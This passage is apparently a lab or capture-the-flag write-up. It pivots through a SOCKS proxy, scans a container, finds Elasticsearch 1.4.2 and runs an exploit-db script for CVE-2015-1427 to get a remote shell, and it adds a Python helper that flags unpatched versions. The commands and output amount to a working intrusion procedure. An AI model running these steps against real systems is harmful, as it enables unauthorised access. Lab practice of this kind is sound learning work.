- This looks very much like the target container we saw earlier, so we can configure a proxy in Firefox and browse to http://172.17.0.1:5000 (look up how to set a browser proxy yourself; the key point is to manually configure a SOCKS host that matches the earlier proxychains.conf).
- The page served is the same as before, so we can conclude that 172.17.0.1 is the host machine that previously appeared as 192.168.56.101.
Probing 172.17.0.2:

```
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.2
[proxychains] config file found: ./proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 20:39 CST
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1720  <--denied
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1025  <--denied
......
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:9200  ...  OK
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:9200  ...  OK
Nmap scan report for 172.17.0.2
Host is up (0.0066s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
```
- A new clue: port 9200 on 172.17.0.2 is open and runs Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2). Note: Elasticsearch is the distributed search and analytics engine at the core of the Elastic Stack.
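As an added example (not code from the original write-up), a small Python triage helper that parses proxychains4 + nmap output in the shape shown above, reports which target ports the SOCKS chain actually reached, and flags an Elasticsearch banner whose version predates the CVE-2015-1427 fix (1.3.8 / 1.4.3); the sample transcript lines are constructed.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample in the shape of the proxychains4 + nmap output above.
SAMPLE_OUTPUT = """\
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1720  <--denied
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1025  <--denied
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:9200  ...  OK
Nmap scan report for 172.17.0.2
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2)
"""

# Last hop of a proxychains "Strict chain" line: target ip:port plus its outcome.
CHAIN_RE = re.compile(r"\.\.\.\s+(\d+\.\d+\.\d+\.\d+):(\d+)\s+(\.\.\.\s+OK|<--denied)")
# nmap -sV service line: "<port>/tcp open <service> <version banner>".
SERVICE_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+(.+)$", re.MULTILINE)
ES_VERSION_RE = re.compile(r"Elasticsearch REST API (\d+(?:\.\d+)+)")

def parse_chain_results(text: str) -> Dict[Tuple[str, int], str]:
    """Map (target ip, port) -> 'OK' or 'denied' as reported by the SOCKS chain."""
    results = {}
    for ip, port, outcome in CHAIN_RE.findall(text):
        results[(ip, int(port))] = "OK" if outcome.endswith("OK") else "denied"
    return results

def parse_services(text: str) -> Dict[int, str]:
    """Map each open TCP port to the nmap version banner."""
    return {int(port): banner.strip() for port, banner in SERVICE_RE.findall(text)}

def es_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Version tuple from an 'Elasticsearch REST API x.y.z' banner, else None."""
    m = ES_VERSION_RE.search(banner)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None

def es_groovy_sandbox_patched(version: Tuple[int, ...]) -> bool:
    """CVE-2015-1427 is fixed in 1.3.8 and 1.4.3 (affected: before 1.3.8, and 1.4.0-1.4.2)."""
    if version[:2] == (1, 4):
        return version >= (1, 4, 3)
    return version >= (1, 3, 8)

def triage(text: str) -> Dict[int, str]:
    """Patch status for every Elasticsearch banner among the open ports."""
    findings = {}
    for port, banner in parse_services(text).items():
        v = es_version(banner)
        if v is not None:
            state = "patched" if es_groovy_sandbox_patched(v) else "UNPATCHED"
            findings[port] = "Elasticsearch %s: %s for CVE-2015-1427" % (".".join(map(str, v)), state)
    return findings
```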
- Here we can use searchsploit to look up Elasticsearch-related vulnerabilities and try to break in.

```
┌──(kali㉿kali)-[~/Workspace]
└─$ searchsploit Elasticse
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution                                                    | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                                    | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                                | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                                            | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                                                 | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                                    | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)                     | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                                       | multiple/webapps/50152.py
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
- Try one of them, /usr/share/exploitdb/exploits/linux/remote/36337.py, but first check whether python2 and its requests package are installed; if not, use the following:

```
sudo apt-get install python2   # install python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py   # install pip for python2; skip this step if you already have it
python2 -m pip install requests   # install the requests package
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2   # run the 36337.py script
```
Getting in:

```
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2
[proxychains] config file found: ./proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
(ASCII-art banner)
Exploit for ElasticSearch , CVE-2015-1427
Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$
```